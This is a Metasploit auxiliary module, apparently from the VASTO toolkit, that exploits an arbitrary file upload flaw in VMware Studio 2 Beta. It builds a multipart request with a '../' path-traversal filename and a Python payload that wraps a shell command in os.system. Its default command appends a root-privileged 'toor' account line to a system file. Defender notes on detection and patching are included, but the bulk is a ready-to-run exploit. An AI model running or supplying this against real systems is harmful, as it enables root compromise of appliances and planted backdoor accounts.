vmware_studio_upload.rb
#################################################################
# #
# This module is part of VASTO #
# Version 0.4 #
# Virtualization ASsessment TOolkit #
# #
#################################################################
require 'msf/core'
require "rexml/document"
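# Auxiliary scanner module for the arbitrary file upload flaw in VMware Studio
# 2 Beta builds older than 2.0.0.946-172280 (version bound taken from 'Name').
#
# What the module does, as visible in #run_host:
#   * sends one multipart POST to /service/depot/upload-tar.py on the appliance
#     management port (RPORT, default 5480, SSL enabled by default);
#   * the "servicetar" part carries a filename that begins with a run of "../"
#     segments followed by the FileName option, i.e. the upload handler is
#     driven to write outside its intended directory (path traversal);
#   * the part body is a short Python script that wraps the CMD option.
# The module only uploads. It never requests the uploaded file afterwards and
# it performs no cleanup of the file or of whatever CMD changed.
#
# Defender notes:
#   * Detection: POST requests to /service/depot/upload-tar.py whose multipart
#     "filename" contains "../", and unexpected .py files appearing under
#     /opt/vmware/share/htdocs/ (the default FileName location).
#   * Mitigation: run a Studio build at or above the version named in 'Name'
#     and keep the management port reachable only from admin networks.
#   * Impact, per the module description: uploaded Python files execute as
#     root on the appliance.
class Metasploit3 < Msf::Auxiliary
  # Exploit mixins should be called first
  include Msf::Exploit::Remote::HttpClient
  #include Msf::Auxiliary::WMAPScanServer
  # Scanner mixin should be near last
  include Msf::Auxiliary::Scanner

  # Registers module metadata and options.
  #
  # The HttpClient defaults for Proxies, VHOST, SSL and RPORT are dropped
  # first; RPORT and SSL are then re-registered with appliance-specific
  # defaults (5480, SSL on). Proxies and VHOST stay deregistered.
  def initialize
    super(
      'Name' => 'VMware Studio < 2.0.0.946-172280 Remote Code Execution',
      'Version' => '0.9',
      'Description' => ' This module exploits VMware Studio 2 Beta (<2.0.0.946-172280) vulnerability. It can upload any arbitrary file on the system, which can then be executed if they are python files. They will run as root on the system.',
      'Author' => 'Claudio Criscione - [email protected]',
      'License' => GPL_LICENSE
    )

    %w[Proxies VHOST SSL RPORT].each { |opt| deregister_options(opt) }

    register_options(
      [
        OptPort.new('RPORT', [ true, "The target port", 5480 ]),
        OptBool.new('SSL', [ true, "Use SSL", true ]),
        OptString.new('FileName', [true, "Uploaded file name and path", "/opt/vmware/share/htdocs/rndupload.py"]),
        # NOTE(review): the default command changes state on the target
        # (appends a line to /etc/hosts); nothing in this module reverts it.
        OptString.new('CMD', [true, "Command to execute", "echo 'toor::0:0:root:/root:/bin/bash'>> /etc/hosts"])
      ], Auxiliary::Scanner)
  end

  # Sends the upload request to one host and reports what the server answered.
  #
  # @param ip [String] address of the host under test, also used as the
  #   request's vhost
  # @return [void]
  def run_host(ip)
    boundary = 'abcdef'
    target_file = datastore['FileName']

    # Multipart body: a single "servicetar" part. FileName and CMD are
    # concatenated in verbatim, with no quoting or escaping.
    data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"servicetar\"; "
    data << "filename=/../../../../../" + target_file + "\r\nContent-Type: text/plain\r\n\r\n"
    data << "#/usr/bin/python \r\n"
    data << "import os \r\n"
    data << "os.system(\""+datastore['CMD']+"\") \r\n"
    data << "\r\n--#{boundary}--"

    res = send_request_raw({
      'uri' => "/service/depot/upload-tar.py",
      'method' => 'POST',
      'vhost' => ip,
      'data' => data,
      'headers' =>
      {
        'Content-Type' => 'multipart/form-data; boundary=' + boundary,
        'Content-Length' => data.length,
      }
    }, 25)

    # The original printed "Successfully uploaded" unconditionally, even when
    # the host never answered. send_request_raw yields nil when no response
    # arrives within the timeout, so that case is reported as an error.
    if res.nil?
      print_error("#{ip} - no response to the upload request for " + target_file)
      return
    end

    # An HTTP answer alone does not prove the file was written (a patched
    # build may still reply); report the status code rather than claim success.
    print_status("#{ip} - upload request for " + target_file + " answered with HTTP #{res.code}")
  end
end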